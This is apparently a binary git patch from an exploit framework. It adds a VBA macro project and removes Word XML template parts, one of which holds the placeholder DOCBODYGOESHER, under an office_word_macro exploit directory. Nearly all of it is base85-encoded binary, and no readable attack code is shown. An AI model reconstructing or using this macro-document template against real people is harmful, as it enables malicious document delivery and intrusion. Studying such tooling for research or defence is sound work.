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 - \ No newline at end of file + \ No newline at end of file diff --git a/data/exploits/office_word_macro/vbaProject.bin b/data/exploits/office_word_macro/vbaProject.bin new file mode 100644 index 0000000000000000000000000000000000000000..0feb5de89ad0dd92d61aeda3f40dc2fb0e25681c GIT binary patch literal 15872 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 WGizROk%WKK)0voOW%LI - \ No newline at end of file diff --git a/data/exploits/office_word_macro/word/document.xml b/data/exploits/office_word_macro/word/document.xml deleted file mode 100644 index 6a8a649e91..0000000000 --- a/data/exploits/office_word_macro/word/document.xml +++ /dev/null @@ -1,2 +0,0 @@ - -DOCBODYGOESHER diff --git a/data/exploits/office_word_macro/word/fontTable.xml b/data/exploits/office_word_macro/word/fontTable.xml deleted file mode 100644 index 43997894d3..0000000000 --- a/data/exploits/office_word_macro/word/fontTable.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/word/settings.xml b/data/exploits/office_word_macro/word/settings.xml deleted file mode 100644 index 2b96121e32..0000000000 --- a/data/exploits/office_word_macro/word/settings.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/word/styles.xml b/data/exploits/office_word_macro/word/styles.xml deleted file mode 100644 index e51ea329dd..0000000000 --- a/data/exploits/office_word_macro/word/styles.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/word/theme/theme1.xml b/data/exploits/office_word_macro/word/theme/theme1.xml deleted file mode 100644 index 9c5cd2b64f..0000000000 --- a/data/exploits/office_word_macro/word/theme/theme1.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/word/vbaProject.bin b/data/exploits/office_word_macro/word/vbaProject.bin deleted file mode 100644 index ec7ea683e143a78acca9cfb4ef836ea47905cb8d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 